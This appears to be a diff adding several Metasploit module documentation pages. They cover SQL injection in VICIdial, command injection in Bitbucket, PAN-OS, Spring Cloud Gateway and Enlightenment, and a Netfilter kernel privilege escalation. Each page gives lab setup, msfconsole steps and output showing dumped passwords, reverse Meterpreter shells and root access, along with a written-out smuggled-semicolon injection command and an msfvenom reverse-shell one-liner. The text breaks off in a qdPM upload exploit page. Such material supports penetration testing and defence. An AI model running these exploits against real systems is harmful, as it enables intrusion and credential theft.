+This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
+svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
+
+- Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.
+- Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.
+- Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.
+- Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.
+- Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.
+
+|                                           | v9.0.3                         | v10.0.0                        |
+| ----------------------------------------- | ------------------------------ | ------------------------------ |
+| List Users - access_recordings method     | X                              | X                              |
+| List Users - agent_time_sheet method      | `view reports` must be enabled | `view reports` must be enabled |
+| List Users - agentcall_email method       | X                              | X                              |
+| List Users - modify_email_accounts method | X                              | X                              |
+| List Users - user_stats method            | `view reports` must be enabled | `view reports` must be enabled |
+
+VICIdial does not encrypt passwords by default.
+
+VICIBox/VICIdial includes an auto-update mechanism, so be aware for creating vulnerable boxes.
+
+### Install
+
+#### 9.0.3 & 10.0.0
+
+1. Install the following OpenSUSE 10 ISO [ViciBox_v9.x86_64-9.0.3.iso](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9.x86_64-9.0.3.iso)
+or [ViciBox_v10.x86_64-10.0.0.iso](http://download.vicidial.com/iso/vicibox/server/archive/ViciBox_v10.x86_64-10.0.0.iso) :
+    1. Change the default password (`root`:`vicidial`)
+    2. Set Timezone, Keyboard Layout, ok the license, and Language
+    3. Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the 
+        command `yast lan` if necessary
+2. Run `vicibox-express` to initiate the ViciDial Express Installation, everything can be kept as default
+3. Navigate to `http://<ip-address>/`
+    1. Click `Administration` and login with default credentials username: `6666`, password: `1234`
+    2. Once logged in, Click `Continue on to the Initial Setup`. Everything can be kept as default. 
+4. The complete list of setup instructions can be found by following this [link](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9-install.pdf)
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/vicidial_multiple_sqli`
+1. Do: `set username <username>`
+1. Do: `set password <password>`
+1. Do `show actions`
+   1. Select from the list or keep the default
+1. Do: `run`
+1. The module will exploit the selected SQL injection and return the extracted usernames and passwords
+
+## Options
+
+### Password
+
+Password for the vicidial instance that corresponds to the username.
+
+### Username
+
+Username for the user to login with. Defaults to admin username of `6666`.
+
+## Scenarios
+
+### ViciBox 9.0.3 - List Users - modify_email_accounts method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
+action => List Users - modify_email_accounts method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Time-based injection: expecting output of length 46
+[!] No active DB -- Credential data will not be saved!
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - access_recordings method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
+action => List Users - access_recordings method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agent_time_sheet method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
+action => List Users - agent_time_sheet method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agentcall_email method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
+action => List Users - agentcall_email method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+### ViciBox 9.0.3 - List Users - user_stats method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
+action => List Users - user_stats method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+Various versions of Bitbucket Server and Data Center are vulnerable to
+an unauthenticated command injection vulnerability in multiple API endpoints.
+
+The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
+creates an archive of the repository, leveraging the `git-archive` command to do so.
+Supplying NULL bytes to the request enables the passing of additional arguments to the
+command, ultimately enabling execution of arbitrary commands.
+
+According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:
+
+  Any version released after version `6.10.17` and before:
+          * `7.6.17`
+          * `7.17.10`
+          * `7.21.4`
+          * `8.0.3`
+          * `8.1.3`
+          * `8.2.2`
+          * `8.3.1`
+
+Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).
+    
+### Installation Instructions
+
+1. Install Git on the target machine
+  * sudo apt install -y git
+2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
+[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
+3. Make sure the resulting bin file is executable and run it
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990
+
+### Vulnerable Setup
+
+1. Log into Bitbucket with your administrator credentials
+2. Once logged in, select `Projects` at the top menu
+3. Select `Create project`
+4. Enter a name for the project and click `Create project`
+5. On the next page, select `Create repository`
+6. Enter a name for the repository and select `Create repository`
+7. Follow the instructions to clone the repository and push data to the repository so it is not empty
+8. Click the gear on the left side of the next page
+9. Select `Repository permissions` under `Security` on the left
+10. Underneath `Public access`, check `Enable` to make the repository public
+
+Bitbucket should now be exploitable
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### USERNAME
+
+An optional username to authenticate to Bitbucket with
+
+### PASSWORD
+
+An optional password to authenticate to Bitbucket with
+
+### Bitbucket version 8.2.1 on Ubuntu 22.04
+
+```
+msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
+rhost => 192.168.140.216
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Searching Bitbucket for publicly accessible repository
+[+] Found public repo 'repo_name' in project 'TEST'!
+[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
+[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
+[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
+[*] Sending stage (3020772 bytes) to 192.168.140.216
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: atlbitbucket
+meterpreter > sysinfo
+Computer     : 192.168.140.216
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
+< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
+Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
+user inputs in the "op" request allows an attacker to inject commands.
+
+A Palo Alto Firewall demo VM can be requested at the following
+[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
+next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
+administrator password.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/panos_auth_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### PAN-OS 10.0.0
+```
+msf6 > use linux/http/panos_auth_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
+rhosts => 192.168.2.196
+msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
+PASSWORD => N0tpassword!
+msf6 exploit(linux/http/panos_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.114:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating...
+[+] Successfully obtained api key
+[+] The target is vulnerable.
+[*] Exploiting...
+[*] Sending stage (989032 bytes) to 192.168.2.196
+[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
+[*] Command Stager progress - 100.00% done (1111/1111 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : PA-VM-10-0-0.home
+OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,80 @@
+## Vulnerable Application
+
+The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an unauthenticated RCE
+vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-2022-22947)
+the versions affected are:
+
+- 3.1.0
+- 3.0.0 to 3.0.6
+- Older, unsupported versions are also affected
+
+A sample demo [project](https://github.com/wdahlenburg/spring-gateway-demo) is available,
+which can be used to run a vulnerable server by following the installation instructions below.
+    
+### Installation Instructions
+
+```bash
+    # To use the pre-compile vulnerable application
+    wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
+    sudo apt install default-jdk
+    java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+
+
+    # If you want to compile for a version of spring cloud gateway on your own
+    git clone https://github.com/wdahlenburg/spring-gateway-demo.git
+
+    # In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. 
+    # To see which spring cloud version includes which version of spring cloud gateway, 
+    # look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/
+
+    apt install maven
+    mvn package -DskipTests
+    java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+```
+
+
+## Verification Steps
+
+- Run the vulnerable server
+- Start msfconsole
+- Do: `use exploit/linux/http/spring_cloud_gateway_rce`
+- Do: `set RHOSTS <server_ip>`
+- Do: `set LHOST <metasploit_machine_ip>`
+- Do: `set RPORT 9000`
+- Do: `run`
+- You should get a Meterpreter shell.
+
+## Options
+
+No particular option to be set
+
+## Scenarios
+
+### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
+
+```
+msf6 > use exploit/linux/http/spring_cloud_gateway_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
+RHOSTS => 192.168.19.140
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
+RPORT => 9000
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set LHOST 192.168.1.7
+LHOST => 192.168.1.7
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if server is vulnerable
+[*] Triggering code execution using routes
+[+] Route deleted
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Triggering code execution using routes
+[*] Sending stage (40164 bytes) to 192.168.1.7
+[*] Meterpreter session 7 opened (192.168.1.7:4444 -> 192.168.1.7:53264) at 2022-10-11 17:44:53 -0400
+[+] Route deleted
+
+meterpreter >
+```
+
@@ -0,0 +1,149 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Netfilter, the Linux Kernel component
+that implements firewall capabilities in Linux.
+The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory.
+The exploit relies on spraying, it may fail, or crash the target system.
+
+### Install
+
+The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`.
+this module contains offsets for some vulnerable Ubuntu versions.
+
+Install Ubuntu 22.04 LTS with a vulnerable kernel version.
+`apt-get install linux-image-5.15.0-25-generic`
+Hold shift when you reboot and select the proper kernel version
+
+## Verification Steps
+
+1. Make an Ubuntu target.
+1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module.
+1. Get a session
+1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
+1. Do: `set session <session_id>`
+1. Do: `set payload <payload>`
+1. Do: `set lhost <ip>`
+1. Do: `set [r|l]port <port>`
+1. Do: `run`
+1. You should get a new session as the `root` user.
+1. If it fails, retry, or reboot Ubuntu and retry.
+
+## Options
+
+### COMPILE
+
+[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source
+code and perform compilation on target, `False` will cause the module to upload a precompiled binary.
+`Auto` will cause the module to try compiling the exploit on the target but will fall back to the
+precompiled option if a compiler cannot be found.
+
+### WritableDir
+
+This indicates the location where you would like the payload and exploit binary stored.
+The default value is `/tmp`
+
+Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if
+`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file
+in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at
+`WritableDir`.
+
+## Scenarios
+
+### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
+
+```
+msf6 > use auxiliary/scanner/ssh/ssh_login
+msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40
+rhosts => 192.168.0.40
+msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane
+username => redouane
+msf6 auxiliary(scanner/ssh/ssh_login) > set password user
+password => user
+msf6 auxiliary(scanner/ssh/ssh_login) > run
+
+[*] 192.168.0.40:22 - Starting bruteforce
+[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc
+[*] Using configured payload linux/x64/shell_reverse_tcp
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0
+lhost => wlan0
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1
+session => 1
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.0.32:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Dropping pre-compiled binaries to system...
+[*] Writing '/tmp/z9G2XJ' (761240 bytes) ...
+[*] Uploading payload...
+[*] Writing '/tmp/AsfKz' (248 bytes) ...
+[*] Running payload on remote system...
+[+] Deleted /tmp/z9G2XJ
+[+] Deleted /tmp/AsfKz
+[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200
+
+id
+[*] Payload executed! If it was successful, a session should have been created
+
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+```
+
+## Notes
+
+### Included Binaries
+The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
+Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
+
+The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run
+when the setuid bit is detected.
+
+Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits
+(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input.
+
+The following snippet shows an example of how one might run a payload to get
+a new Bash shell as the `root` user.
+
+```
+redouane@wizardly-maxwell:~$ id
+uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
+redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload
+[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+[-] No arch selected, selecting arch: x64 from the payload
+No encoder specified, outputting raw payload
+Payload size: 96 bytes
+Final size of elf file: 216 bytes
+Saved as: payload
+redouane@wizardly-maxwell:~$ chmod +x payload
+redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 &
+[1] 2272
+redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337
+
+redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload
+[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected
+[+] Second process currently waiting
+[+] Get CAP_NET_ADMIN capability
+[+] Netlink socket created
+[+] Netlink socket bound
+[+] Table table created
+[+] Set for the leak created
+[+] Set for write primitive created
+[*] Leak in process
+[+] Leak succeed
+[+] kaslr base found 0xffffffff9f000000
+[+] physmap base found 0xffff910a00000000
+[+] modprobe path changed !
+[+] Modprobe payload setup
+[?] waitpid
+[?] sem_post
+[+++] Got root shell, should exit?
+Connection received on localhost 56962
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+root:!:19193:0:99999:7:::
+daemon:*:19101:0:99999:7:::
+```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+This module exploits a command injection within Enlightenment's
+`enlightenment_sys` binary. This is done by calling the mount
+command and feeding it paths which meet all of the system
+requirements, but execute a specific path as well due to a
+semi-colon being used.
+This module was tested on Ubuntu 22.04.1 X64 Desktop with
+enlightenment 0.25.3-1 (current at module write time)
+
+### Install
+
+At the time of writing, it was possible to `apt install enlightenment` to
+get a vulnerable version.
+
+### Main Command Explanation
+
+The main exploit command will look similar to the following (using `/tmp/exploit` as the payload path example):
+
+`/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net`
+
+This can be broken down in to several parts:
+
+1. `/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys`
+2. `/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u)`
+3. `"/dev/../tmp/;/tmp/exploit"`
+4. `/tmp///net`
+
+The first part calls the vulnerable executable which has `suid` set to root.
+
+The second portion is a standard mount, command. `enlightenment_sys` has a fork in the code
+for `mount`, which has the vulnerability in it.
+
+The third portion starts with `/dev/` to prevent the binary from exiting.  It is wrapped in
+double quotes, which are later removed by `enlightenment_sys` before running the command
+resulting in the command injection.
+
+Lastly `enlightenment_sys` checks that the last parameter is length 6, thus the extra `/`.
+It then calls `stat64` on `/tmp///net` and we pass that check.
+
+Now that all the checks have passed and the exploit code should go down the path to a `system`
+call. Again, the quotes are removed around `"/dev/../tmp/;/tmp/exploit"` , allowing for the `;`
+to be relevant and cause a command injection.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a userland shell
+4. Do: `use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc`
+5. Do: `set session #`
+6. Set payload and options for payload as needed
+7. Do: `run`
+8. You should get a root shell.
+
+## Options
+
+### WritableDir
+
+A directory which is writable to drop our payload in. Defaults to `/tmp`
+
+## Scenarios
+
+### Ubuntu 22.04.1 Desktop with Enlightenment 0.25.3-1
+
+Step 1, get a userland shell
+
+```
+resource (enlightenment.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (enlightenment.rb)> set username ubuntu
+username => ubuntu
+resource (enlightenment.rb)> set password ubuntu
+password => ubuntu
+resource (enlightenment.rb)> set rhosts 192.168.2.31
+rhosts => 192.168.2.31
+resource (enlightenment.rb)> run
+[*] 192.168.2.31:22 - Starting bruteforce
+[+] 192.168.2.31:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux ubuntu2204desktop 5.15.0-43-generic #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.2.199:35675 -> 192.168.2.31:22) at 2022-10-01 10:02:53 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Step 2, run exploit
+
+```
+resource (enlightenment.rb)> use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (enlightenment.rb)> set session 1
+session => 1
+resource (enlightenment.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/local/ubuntu_enlightenment_mount_priv_esc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[+] The target appears to be vulnerable.
+[*] Finding enlightenment_sys
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[*] Writing '/tmp/.7n09J2bt6' (250 bytes) ...
+[*] Max line length is 65537
+[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
+[*] Creating folders for exploit
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.2.31
+[*] Meterpreter session 2 opened (192.168.2.199:4444 -> 192.168.2.31:54700) at 2022-10-01 10:03:12 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.2.31
+OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccount/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be exploited by uploading a PHP script and invoking it by making a request to it. 
+The script will run with the same privileges as the web server.
+The module has been tested against qdPM version 9.1
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/qdpm_authenticated_rce`
+- [ ] `set EMAIL <email>`
+- [ ] `set PASSWORD <password>`
+- [ ] `set TARGETURI <target_uri>`
+- [ ] `set RHOST <rhost>`
+- [ ] `set RPORT <rport>`
+- [ ] `exploit`
+- [ ] Add SSL, Proxy, and VHOST options if needed.
+- [ ] Verify that a new session is created.
+
+## Options
+
+  **EMAIL**  
+  [Required]  
+  The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not.
+
+  **PASSWORD**  
+  [Required]  
+  The password of the user you are trying to exploit.
+
+  **TARGETURI**  
+  The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder.
+
+## Scenarios
+
+As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected.
+  
+   
+  **Attacking with a generic PHP payload, OS independed**
+
+```
